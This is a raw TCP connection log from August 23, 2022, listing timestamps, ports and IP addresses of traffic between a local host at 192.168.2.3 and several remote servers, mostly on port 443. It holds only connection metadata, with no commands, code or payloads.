Aug 23, 2022 18:23:34.635557890 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.678320885 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.678522110 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:34.678730965 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.680166960 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:34.680196047 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:35.315898895 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.315962076 CEST	443	49775	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.316082001 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.316531897 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.316550016 CEST	443	49775	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.363989115 CEST	443	49775	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.364614964 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.364656925 CEST	443	49775	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.366560936 CEST	443	49775	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.366693974 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.401753902 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.401978016 CEST	443	49763	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.402054071 CEST	49763	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.402266026 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.402525902 CEST	443	49765	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.402585983 CEST	49765	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.402904987 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.402908087 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.403136969 CEST	443	49775	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.403142929 CEST	443	49766	8.8.8.8	192.168.2.3
Aug 23, 2022 18:23:35.403215885 CEST	49775	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:35.403534889 CEST	49766	443	192.168.2.3	8.8.8.8
Aug 23, 2022 18:23:36.127445936 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.127494097 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.127579927 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.127991915 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.128009081 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.172333002 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.172410011 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.172612906 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.173275948 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.173290968 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.213458061 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.230526924 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.230573893 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.231153965 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.251975060 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.273228884 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.273540974 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.273669958 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.273715019 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.274024010 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.274542093 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.298727036 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.298837900 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.298978090 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.319906950 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.320182085 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.326394081 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.326448917 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.381248951 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.536119938 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.536226988 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.536367893 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.554955006 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.555006027 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.639179945 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.639384031 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.933562040 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.933598995 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.933989048 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.934104919 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.943650007 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.969073057 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.969214916 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:36.969219923 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:36.969285011 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.189237118 CEST	49779	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.189280033 CEST	443	49779	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.648731947 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.648793936 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.648896933 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.649352074 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.649374962 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.727941036 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.728331089 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.728957891 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.728981018 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.730993986 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.731017113 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.773840904 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.773917913 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:37.773937941 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.773969889 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.777245998 CEST	49787	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:37.777290106 CEST	443	49787	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:38.981161118 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:38.981236935 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:38.981372118 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:38.982372046 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:38.982399940 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.024485111 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.049103975 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.049278975 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.049437046 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.062207937 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.181284904 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.225950003 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.225977898 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.226759911 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.281320095 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.291224003 CEST	49778	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.291266918 CEST	443	49778	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.292824984 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:39.293137074 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:39.381326914 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:40.942553043 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:40.942615032 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:40.942713976 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:40.947257042 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:40.947299004 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.026762962 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.026916981 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.052220106 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.052258015 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.057846069 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.057869911 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.082638979 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.082734108 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.082779884 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.082808018 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.100368023 CEST	49795	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.100425005 CEST	443	49795	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.556643009 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.556699038 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.557120085 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.674599886 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.674622059 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.800509930 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.826077938 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.826191902 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:41.826277971 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.934292078 CEST	49789	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:41.934336901 CEST	443	49789	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:42.761995077 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:42.774030924 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:42.774060011 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:42.774652004 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:42.776719093 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:42.776913881 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:42.859759092 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.344551086 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:43.344692945 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:43.344831944 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:43.389287949 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.389375925 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.389527082 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.415074110 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.415117979 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.492399931 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.492585897 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.509577036 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.509619951 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.512876987 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.512923002 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.539242983 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.539328098 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:43.539326906 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.539377928 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.556305885 CEST	49803	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:43.556344986 CEST	443	49803	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:45.391784906 CEST	49760	443	192.168.2.3	142.251.209.4
Aug 23, 2022 18:23:45.391866922 CEST	443	49760	142.251.209.4	192.168.2.3
Aug 23, 2022 18:23:47.071456909 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.071527958 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.071662903 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.072092056 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.072124004 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.095901966 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.120735884 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.120837927 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.120923996 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.124488115 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.124555111 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.153595924 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.161854982 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.161900997 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.162609100 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.163238049 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:47.163402081 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:47.259397984 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:53.890815973 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:53.890872002 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:53.890964031 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:53.896780014 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:53.896806002 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:53.975780010 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:53.975903988 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.024938107 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.024992943 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.025084972 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.025432110 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.025449038 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.089047909 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.089061022 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.089710951 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.095736027 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.095763922 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.104893923 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.114772081 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.114885092 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.114984035 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.120331049 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.120486975 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.120487928 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.120565891 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.132738113 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.132775068 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.133485079 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.135379076 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.135507107 CEST	49809	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.135545015 CEST	443	49809	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.135641098 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:54.181921959 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.232342958 CEST	49816	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:54.232374907 CEST	443	49816	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.370969057 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.371012926 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.371140957 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.406343937 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.406373978 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.486983061 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.487138033 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.498693943 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.498708963 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.500612020 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.500623941 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.534908056 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.534985065 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.535006046 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.535036087 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.550564051 CEST	49825	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.550590992 CEST	443	49825	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.644114971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.678127050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.678265095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.719966888 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.720027924 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.720202923 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.720434904 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.720464945 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.732950926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.767277002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.793553114 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.801635981 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.802210093 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.802244902 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.802757978 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.803237915 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.803399086 CEST	443	49828	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.819184065 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.819257975 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.819382906 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.823632002 CEST	49817	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:55.823672056 CEST	443	49817	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:55.913353920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.913415909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.913459063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.913486004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.913500071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.913516045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.913530111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.913542032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:55.913579941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.913599968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:55.982434988 CEST	49828	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:56.128417015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:56.163664103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.273391008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.273513079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.273767948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.273833036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.274369955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.274446011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.274564028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.274626017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.276144981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.276216984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.276243925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.276266098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.276268959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.276305914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.276313066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.276355028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.276364088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.276411057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.276418924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.276464939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.307250977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.307286024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.307374954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.307374001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.307389975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.307399988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.307419062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.307432890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.308044910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.308074951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.308113098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.308131933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.308134079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.308165073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.308190107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310065031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310097933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310122967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310148001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310163975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310169935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310189009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310193062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310221910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310244083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310286999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310328960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310329914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310364962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310599089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310626030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310648918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310659885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310672045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.310672998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310687065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.310705900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.342032909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.342067957 CEST	80	49827	45.95.11.158	192.168.2.3
